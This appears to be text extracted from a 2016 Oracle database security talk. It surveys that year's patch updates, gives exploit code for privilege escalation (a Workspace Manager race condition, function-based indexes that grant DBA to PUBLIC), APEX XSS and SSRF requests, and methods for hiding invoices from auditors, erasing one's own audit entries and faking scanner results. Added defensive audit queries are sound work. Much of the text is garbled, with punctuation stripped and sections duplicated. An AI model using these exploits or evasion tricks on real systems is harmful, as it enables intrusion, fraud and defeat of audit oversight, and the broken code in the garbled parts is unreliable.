The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016
Nothing special happened
October 2016
Oracle CPU October 2016
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 9.1)
2 Kernel PDB (CVSS 6.4, 6.0)
3 RDBMS Security (CVSS 6.4, 3.3, 3.3)
1 APEX (CVSS 6.1, remote)
1 RDBMS Security & SQL*Plus (CVSS 2.4)
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
Oct 2016 CPU - CVE-2016-5497
Problem: UNSALTED MD5 HASH STILL PRESENT IN 12C DATABASE - DIGEST VERIFIER
Shown as an open problem at the DOAG 2015 presentation
Reporter: Alexander Kornbrust
Oracle Password Hash 12.1.0.2+
Oracle 12.1.0.2 introduced a new PBKDF2 SHA-512 based algorithm
The new T: password hash is 10 times slower than the old DES hash (Oracle 7+) and 88 times slower than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already implemented in some tools
Remark: Microsoft Office 2013 is 10 times more time consuming to crack than the new Oracle PBKDF2
Oracle Password Hash 12.1.0.2+
Let's have a look at RFC 2617:
KD(secret, data) = H(concat(secret, ":", data))
No salt, but a secret
Secret = 'XDB'
and the hash will be MD5('XDB:tiger')
and is stored in the spare4 column, starting with 'H:' (Hash)
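Added example (not from the slides): an inventory of the verifier types stored per account, so a DBA can see which accounts still carry the unsalted H: digest from CVE-2016-5497. It assumes the SYS.USER$ layout described above (10g DES hash in PASSWORD, the ';'-separated 11g/12c verifiers in SPARE4) and SELECT on SYS.USER$.

```sql
-- Which password verifiers does each account carry? Accounts with the
-- unsalted MD5 digest (H:) are listed first.
-- Assumption: S:, T: and H: tags only occur as verifier prefixes, because
-- the verifier bodies themselves are hex digits.
SELECT u.name,
       CASE WHEN u.password IS NOT NULL THEN 'DES(10g) '    END ||
       CASE WHEN u.spare4 LIKE '%S:%'   THEN 'SHA1(11g) '   END ||
       CASE WHEN u.spare4 LIKE '%T:%'   THEN 'PBKDF2(12c) ' END ||
       CASE WHEN u.spare4 LIKE '%H:%'   THEN 'MD5-DIGEST'   END AS verifiers,
       CASE WHEN u.spare4 LIKE '%H:%'
            THEN 'unsalted digest verifier present (CVE-2016-5497)'
       END AS finding
FROM   sys.user$ u
WHERE  u.type# = 1                                  -- 1 = user, 0 = role
AND    (u.spare4 IS NOT NULL OR u.password IS NOT NULL)
ORDER BY CASE WHEN u.spare4 LIKE '%H:%' THEN 0 ELSE 1 END, u.name;
```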
Oct 2016 CPU - CVE-2016-5516
Problem: In Oracle 12c the DBMS_PDB_EXEC_SQL procedure is a wrapper for the DBMS_PDB.EXEC_AS_ORACLE_SCRIPT procedure, which executes SQL as the SYS user. The XDB user has the execute privilege on DBMS_PDB_EXEC_SQL and as such, by first exploiting a vulnerability in a publicly executable XDB-owned PL/SQL object, an attacker can leverage this privilege to execute SQL as SYS. The fix changes both DBMS_PDB_EXEC_SQL and DBMS_PDB from the DEFINER rights to the INVOKER rights execution model.
Reporter: David Litchfield
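Added example (not from the slides): two dictionary queries to confirm that the fix described above is in place (both objects should now report AUTHID CURRENT_USER) and to list who can execute them. It assumes a 12c dictionary and DBA access; the object names are taken from the slide.

```sql
-- 1. Execution model of the two wrappers. A DEFINER row means every caller
--    runs the code with SYS's rights, which is the pre-fix state.
SELECT p.owner, p.object_name, p.object_type, p.authid,
       CASE WHEN p.authid = 'DEFINER'
            THEN 'runs as SYS for every caller - patch missing?'
       END AS note
FROM   dba_procedures p
WHERE  p.owner = 'SYS'
AND    p.object_name IN ('DBMS_PDB', 'DBMS_PDB_EXEC_SQL')
AND    p.procedure_name IS NULL            -- the object-level row, not its subprograms
ORDER BY p.object_name;

-- 2. Who may call them at all? On the slide it is XDB; anything beyond the
--    accounts you expect deserves a look.
SELECT t.grantee, t.table_name, t.grantable
FROM   dba_tab_privs t
WHERE  t.owner = 'SYS'
AND    t.table_name IN ('DBMS_PDB', 'DBMS_PDB_EXEC_SQL')
AND    t.privilege = 'EXECUTE'
ORDER BY t.table_name, t.grantee;
```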
Oct 2016 CPU - CVE-2016-5604
Problem: Privilege escalation in Oracle Cloud Control (12.1.3)
Reporter: Alexander Kornbrust
sqlplus sysman_apm/rds@ora1
SQL> desc dba_users
ERROR:
ORA-04043: object SYS.DBA_USERS does not exist
==> user does not have the privilege to access DBA_USERS
SQL> select * from user_sys_privs;
USERNAME      PRIVILEGE              ADM
SYSMAN_APM    UNLIMITED TABLESPACE   NO
SYSMAN_APM    CREATE VIEW            NO
SYSMAN_APM    CREATE ANY LIBRARY     NO
SYSMAN_APM    CREATE SEQUENCE        NO
SYSMAN_APM    CREATE TABLE           NO
SYSMAN_APM    CREATE LIBRARY         NO
SYSMAN_APM    CREATE ANY INDEX       NO
==> CREATE ANY LIBRARY privilege is granted to SYSMAN_APM
SQL> select * from user_role_privs;
USERNAME      GRANTED_ROLE   ADM  DEF  OS_
SYSMAN_APM    CONNECT        NO   YES  NO
SYSMAN_APM    RESOURCE       NO   YES  NO
==> Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR
  DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant dba to public';
  COMMIT;
  RETURN FOO;
END;
/
==> Grant execution privileges to PUBLIC
SQL> grant execute on getdba to public;
==> Create an index on SYSTEM.HELP using a function based index (FBI); the function getdba is used for the function based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));
==> Reconnect is necessary
SQL> select * from dba_role_privs where granted_role='DBA' and grantee='PUBLIC';
GRANTEE   GRANTED_ROLE   ADM  DEF
PUBLIC    DBA            NO   YES
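Added example (not from the slides) covering both function-based-index escalations above, CVE-2016-3489 (INDEX grant on SYS tables) and CVE-2016-5604 (CREATE ANY INDEX held by SYSMAN_APM): the dictionary checks a DBA can run to find the preconditions and the traces such an index leaves. It assumes a 12c dictionary and DBA access; the whitelists of expected grantees are my assumptions.

```sql
SET SERVEROUTPUT ON SIZE UNLIMITED

-- 1. Who may build an index on a table he does not own? The system privilege
--    CREATE ANY INDEX or the object privilege INDEX is enough for the trick.
SELECT grantee, 'CREATE ANY INDEX' AS how, NULL AS target
FROM   dba_sys_privs
WHERE  privilege = 'CREATE ANY INDEX'
AND    grantee NOT IN ('SYS', 'DBA')            -- assumption: expected holders
UNION ALL
SELECT grantee, 'INDEX ON', owner || '.' || table_name
FROM   dba_tab_privs
WHERE  privilege = 'INDEX'
AND    grantee <> owner
ORDER BY 1, 2, 3;

-- 2. Who may let invoker-rights code run with a powerful user's privileges?
--    On 12c the index build fails with ORA-06598 unless the function owner can
--    inherit the privileges of the user executing it.
SELECT grantee, privilege AS detail
FROM   dba_sys_privs
WHERE  privilege = 'INHERIT ANY PRIVILEGES'
AND    grantee NOT IN ('SYS', 'DBA')
UNION ALL
SELECT grantee, 'INHERIT PRIVILEGES ON USER ' || table_name
FROM   dba_tab_privs
WHERE  privilege = 'INHERIT PRIVILEGES'
AND    table_name IN ('SYS', 'SYSTEM');         -- assumption: users worth guarding

-- 3. Function-based indexes that sit in another schema than their table or
--    whose expression calls a function from a third schema, e.g.
--    SYSTEM.EXPLOIT_INDEX on SYS.INCVID or SYSMAN_APM.EXPLOIT_INDEX on SYSTEM.HELP.
DECLARE
  l_expr   VARCHAR2(32767);
  l_schema VARCHAR2(128);
BEGIN
  FOR r IN (SELECT index_owner, index_name, table_owner, table_name, column_expression
            FROM   dba_ind_expressions)
  LOOP
    l_expr := UPPER(r.column_expression);      -- LONG column, readable in PL/SQL
    -- schema part of the first schema-qualified call, e.g. "SYSTEM"."GETDBA"('AK')
    l_schema := REGEXP_SUBSTR(l_expr, '"?([A-Z0-9_$#]+)"?\."?[A-Z0-9_$#]+"?\s*\(',
                              1, 1, NULL, 1);
    IF r.index_owner <> r.table_owner
       OR (l_schema IS NOT NULL AND l_schema NOT IN ('SYS', r.table_owner))
    THEN
      DBMS_OUTPUT.PUT_LINE('SUSPICIOUS FBI ' || r.index_owner || '.' || r.index_name
                           || ' ON ' || r.table_owner || '.' || r.table_name
                           || ' -> ' || l_expr);
    END IF;
  END LOOP;
END;
/
```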
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
A top manager comes to the office of the DBA and asks you: "Tomorrow the auditor from the tax authority will come to check our invoices. Could you hide the 10000 EUR invoice from the last party at the night club, just from the auditor? I will increase your salary…"
Scenario 2
Remove your own audit entries from the audit log, which is retrieved by the SIEM solution (e.g. Splunk, QRadar, …) via JDBC
Scenario 3
You don't have time to harden all your databases, but the security department wants to see results. Instead of fixing the problem you will just deliver the proper results
A lot of different wishes…
but luckily we are using Oracle
Problem & Solution
Oracle offers different features to fulfill these wishes without affecting other users…
All these scenarios have in common that we have to manipulate the SQL statement
Select value …
Oracle Data Redaction allows to mask / manipulate the selected data just for a single database user
Possible usage: replace true/false, replace USER/ADMIN, …
the DBA can decide what will be returned
Select value …
A typical query from security checklists/scanners looks like this: select upper(value) from parameter where upper(name) = 'XYZ'
The tool expects the value TRUE but it contains FALSE
Oracle Data Redaction allows you to change the result value from FALSE to TRUE
==> The audit department is happy because the database passes all the security checks…
… from table/view …
Modifying objects can be used as man in the middle as well
Possible approaches:
modify views (e.g. add spare != 'DBA1' to the view dba_audit_trail): all entries of the OS user DBA1 will be removed from the view; if a SIEM solution retrieves the audit data, the entries of DBA1 are not retrieved
create or change synonyms to "redirect" objects
replace table with view / instead-of trigger
----- dbms_macadm -----
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN
    RETURN 'N';
  END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN
    RETURN 'N';
  END IF;
  RETURN 'Y';
END;
SQL> create or replace view mydual as select 'X' as dummy from dual where user='DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
… where x=y
where conditions can be changed using VPD
VPD: add where clause invoice_name != 'SAUNA_CLUB CHANTAL'
Hide "certain" invoices from the audit department
Select value from table/view where x=y
SQL Translation Framework (12c only) allows to replace an entire query: the user submits Query A, the SQL Translation Framework replaces Query A with Query B
Possible countermeasures for paranoid auditors
Add a random string (e.g. aksdjhiuz) to every query to avoid the SQL Translation Framework (the query gets a new SQL_ID)
Try to get EXEMPT ACCESS POLICY to disable VPD (even if not used in the application)
Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
Always check the object type (is it really a table?)
Use checksums for certain database objects (especially views)
Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for applications
(Huge) potential on critical systems to modify application logic (e.g. DB Vault)
DBAs and auditors/security departments should be aware of powerful Oracle features which could be used to modify application logic
Audit these features even if not in use
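Added example (not from the slides): an audit script for the countermeasures listed above. It checks where the public synonym DUAL points and what object type is behind it, reports the current schema, lists active Data Redaction, VPD and SQL Translation policies (which should be empty where the features are not in use), and fingerprints the DDL of views a SIEM or scanner relies on. It assumes 12c and DBA rights; the list of views to fingerprint is my choice.

```sql
SET SERVEROUTPUT ON SIZE UNLIMITED

-- 1. Is DUAL still SYS.DUAL, is it a table, and which schema are we in?
--    Expected: SYS DUAL TABLE <your schema>; anything else is a redirection.
SELECT s.synonym_name, s.table_owner, s.table_name, o.object_type,
       SYS_CONTEXT('USERENV', 'CURRENT_SCHEMA') AS cur_schema
FROM   dba_synonyms s
JOIN   dba_objects  o ON o.owner = s.table_owner AND o.object_name = s.table_name
WHERE  s.owner = 'PUBLIC'
AND    s.synonym_name = 'DUAL';

-- 2. Features that rewrite results or whole queries. On a system that does
--    not use them this result set must be empty.
SELECT 'DATA REDACTION' AS feature,
       object_owner || '.' || object_name AS target,
       policy_name AS detail
FROM   redaction_policies
UNION ALL
SELECT 'VPD', object_owner || '.' || object_name,
       policy_name || ' -> ' || pf_owner || '.' || "PACKAGE" || '.' || "FUNCTION"
FROM   dba_policies
WHERE  enable = 'YES'
UNION ALL
SELECT 'SQL TRANSLATION', owner || '.' || profile_name, NULL
FROM   dba_sql_translation_profiles
ORDER BY 1, 2;

-- 3. Checksum the full DDL of critical views. Store the hashes and diff them
--    on every audit run. DBMS_METADATA returns the complete text, so views
--    longer than the 4000 bytes of DBA_VIEWS.TEXT_VC are covered as well.
DECLARE
  TYPE name_list IS TABLE OF VARCHAR2(128);
  l_views name_list := name_list('DBA_AUDIT_TRAIL', 'DBA_USERS', 'DBA_ROLE_PRIVS',
                                 'DBA_SYS_PRIVS', 'V_$PARAMETER');   -- my selection
  l_ddl   CLOB;
  l_hash  RAW(32);
BEGIN
  -- disable pretty printing so whitespace changes do not alter the hash
  DBMS_METADATA.SET_TRANSFORM_PARAM(DBMS_METADATA.SESSION_TRANSFORM, 'PRETTY', FALSE);
  FOR i IN 1 .. l_views.COUNT LOOP
    l_ddl  := DBMS_METADATA.GET_DDL('VIEW', l_views(i), 'SYS');
    l_hash := DBMS_CRYPTO.HASH(l_ddl, DBMS_CRYPTO.HASH_SH256);
    DBMS_OUTPUT.PUT_LINE(RPAD('SYS.' || l_views(i), 32) || RAWTOHEX(l_hash));
  END LOOP;
END;
/
```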
Trends 2017
New hardening documents for Oracle 12.2 required (new features, new packages, …)
Migration to 12.2
More auditing projects
Integration of auditing with SIEM solutions
Q & A
Thank you / Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Agenda
iexcl Intro
iexcl January 2016 - November 2016
iexcl Outlook 2017
iexcl QampA
Introduction
What will be shown in the next 45 minutes
iexcl Oracle Security Patches
iexcl Modify SQL statements amp Application Logic
iexcl Outlook 2017
Oracle Patches
Database Vulnerabilities and CPU
Patch situation is getting better but Oracle 12c
offers a large new playground (=tons of new
features) for security researchers
Problem Just a few people are doing security
research in the database
Nearly 50 of the database vulnerabilities were
foundreported by 2 researchers (David
Litchfield amp Alexander Kornbrust)
Oracle Vulnerabilities 2016
Oracle Vulnerabilities 2016
Number of vulnerabilities in Oracle database increasing again
iexcl 30 findings in 2016 (2015 29 2014 43 2013 13 2012 17)
iexcl 8 remote exploitable bugs (20153 2014 4 2013 7 2012 8 )
bull January 2016 CPU (7 Vulnerabilities ndash 0 remote)
bull April 2016 CPU (5 Vulnerabilities ndash 2 remote)
bull July 2016 CPU (9 Vulnerabilities ndash 5 remote)
bull October 2016 CPU (9 Vulnerabilities ndash 1 remote)
2016
January 2016
Oracle CPU January 2016
Exploiting the Oracle Workspace Manager SQL
Race Condition (David Litchfield)
DB Database Assessment Tool
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html httpwwwdavidlitchfieldcomExploitingtheOracleWorkspaceManagerSQLRaceConditionpdf httpsgithubcomfoospidyDbDat
January 2016 CPU
7 security fixes (No remote exploitable)
1 Java VM (CVSS 90)
1 Workspace Manager (CVSS 65)
2 XML Database (CVSS 55 40)
1 Database Vault (CVSS 40)
1 Security (CVSS 40)
1 XML Developerrsquos Kit (CVSS 40)
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
